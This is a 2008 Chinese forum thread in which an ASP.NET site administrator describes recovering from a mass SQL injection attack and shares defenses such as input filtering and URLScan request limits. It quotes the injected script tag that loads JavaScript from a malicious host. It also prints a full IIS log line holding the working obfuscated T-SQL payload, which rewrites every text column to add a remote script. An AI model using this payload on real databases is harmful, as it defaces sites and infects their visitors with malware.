ASP.net|论坛|个人空间|相册数据库遭到攻击（JS），的解决过程

sh_login - 2008-5-14 23:05:00

数据库被黑很多表的字段的值后面被加上
</title>"><scrip</title>"><script src=http://%61%31%38%38%2E%77%73/1.js></script><!

公司的网站从从5.1节后连续遭受DDOS，和SQL注入攻击！但是论坛没有受到攻击。同样是SQL2000。公司网站的SQL2000和论坛分布在2台机器上。

解决办法是：
1.在网页程序（ASP.NET1.0）中优化代码，检测在传递数据的是否有非法字符。
2.加装微软的URLSCAN。（http://www.microsoft.com/technet/security/tools/urlscan.mspx）

配置方法：http://www.microsoft.com/china/t ... ance/secmod114.mspx

其中重要的是：

限制请求大小可以使用 URLScan 作为另一道防线，甚至在请求到达 ASP.NET 之前，用来抵御拒绝服务攻击。可以通过对 MaxAllowedContentLength、MaxUrl 和 MaxQueryString 属性设置限制来达到这一目的。
要限制请求的大小，请将下列配置添加到 URLScan.ini 中：
[RequestLimits]
; 此段落中的条目对到达服务器
; 的允许的请求部分的长度进行限制。
;MaxAllowedContentLength=2000000000
;MaxUrl=16384
;MaxQueryString=4096
改成：
MaxAllowedContentLength=2000000000
MaxUrl=240
MaxQueryString=300

然后用Pangolin来攻击自己的服务器，看是否有效！

事后才知道

国外媒体报道，F-Secure公司估计近期将有5000万的网页被黑客攻击，这里面甚至包括一些来自UN和英国政府的站点。

　　据安全研究人员称，只要访问受到感染的站点，用户就可能遭到攻击。在浏览这些站点时，用户的计算机会加载一个名为1,js的文件。该文件存储在一台恶意服务器上，会试图执行8种不同的针对微软应用软件的恶意代码。

　　对此，微软安全响应中心的比尔·席斯克在一篇博客中写道，攻击不是由IIS或SQL Server中新发现或尚未发现的安全缺陷造成的。他说，攻击可能是由植入的SQL恶意代码造成的，并指出，Web开发人员应当遵守微软制定的开发行为守则，以防止类似攻击。

　　另外，有人认为此次攻击仅仅是一种利用Google自动寻找并利用微软SQL漏洞的工具所为。可能人们误以为是IIS新漏洞但实际是利用网页开发人员代码设计上的疏忽。

在被攻击之前，我就是在网页里加上了GOOGLE流量代码，才招来了黑客的攻击！
我已经把GOOGLE的流量代码删除了！

戏水 - 2008-5-15 9:50:00

安全问题不容忽视。

sh_login - 2008-5-25 0:59:00

今天在xy7的博客上看到一篇很搞笑的博文，“各位"虫族"黑客们消停下成吗？”，在想想前几天合作伙伴服务器发生的事情，都是因为这种“SQL群注 update”技术引起的，暗地里骂个娘。现在很多工具可以让隔壁天天数母牛的脑残儿轻松的给网站以致命的打击，但本质都是程序本身的问题，怨不得别人。

2008-05-12 18:25:02 202.165.185.210 - x.x.x.x. 80 GET

/xxx/xxx.asp id=123;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 200 Mozilla/4.0

kenth - 2008-5-25 5:09:00

收藏！谢谢！
------------------
IOAS：易学易用、灵活自由、个人免费使用的办公系统速成工具。
详情请访问：www.ioas.net
------------------

sunwoyu - 2008-5-25 10:54:00

我的也是这个问题。

sh_login - 2008-5-25 12:57:00

:D 我错误重定向，链接到http://www.cyberpolice.cn/index2.jsp

fatwa - 2008-5-26 15:43:00

相关解决办法请点击：http://nt.discuz.net/showtopic-48906.html

sh_login - 2008-5-26 15:51:00

引用:

原帖由 fatwa 于 2008-5-26 15:43:00 发表
相关解决办法请点击：http://nt.discuz.net/showtopic-48906.html

我靠，RAR下载包里不过是IIS日志，哪有解决方法啊？你跑这里忽悠个啥。

lovebzn - 2008-5-26 15:56:00

呵呵

fatwa - 2008-5-26 16:19:00

引用:

原帖由 sh_login 于 2008-5-26 15:51:00 发表

引用:

原帖由 fatwa 于 2008-5-26 15:43:00 发表
相关解决办法请点击：http://nt.discuz.net/showtopic-48906.html

我靠，RAR下载包里不过是IIS日志，哪有解决方法啊？你跑这里忽悠

等待相关人员解答不。。。

sh_login - 2008-5-26 23:00:00

引用:

原帖由 fatwa 于 2008-5-26 16:19:00 发表
[quote] 原帖由 sh_login 于 2008-5-26 15:51:00 发表
[quote] 原帖由 fatwa 于 2008-5-26 15:43:00 发表
相关解决办法请点击：[url=http://nt.discuz.net/showtopic-48906.html]http://nt.discuz.net/showtopic-48906.htm

近期的SQL注入攻击，都是程序代码太弱，留下的祸根！

1.首先还是强壮自己的程序。
2.URLSCAN一定要安装。
3.杀软建议用江民国内的。如果你是开代理服务器的话，代理服务器端强烈建议你装“江民”。

lovebzn - 2008-5-27 11:08:00

安全是相对的，安全问题不仅仅涉及到程序，还涉及到服务器自身的安全，两者是必须一起考虑的。当然一般情况下先是通过数据库或程序入侵，其次才是通过服务器漏洞入侵网站，这样就是针对性能比较强了。

桂桂 - 2008-6-2 3:08:00

哈哈我的服务器也是被别个DDOS了TMD 气死我了..不过后来装了一个软件....效果还可以......:D :D

dangjun625 - 2008-6-10 17:21:00

引用:

原帖由 fatwa 于 2008-5-26 16:19:00 发表
[quote] 原帖由 sh_login 于 2008-5-26 15:51:00 发表
[quote] 原帖由 fatwa 于 2008-5-26 15:43:00 发表
相关解决办法请点击：[url=http://nt.discuz.net/showtopic-48906.html]http://nt.discuz.net/showtopic-48906.htm

Discuz!NT官方社区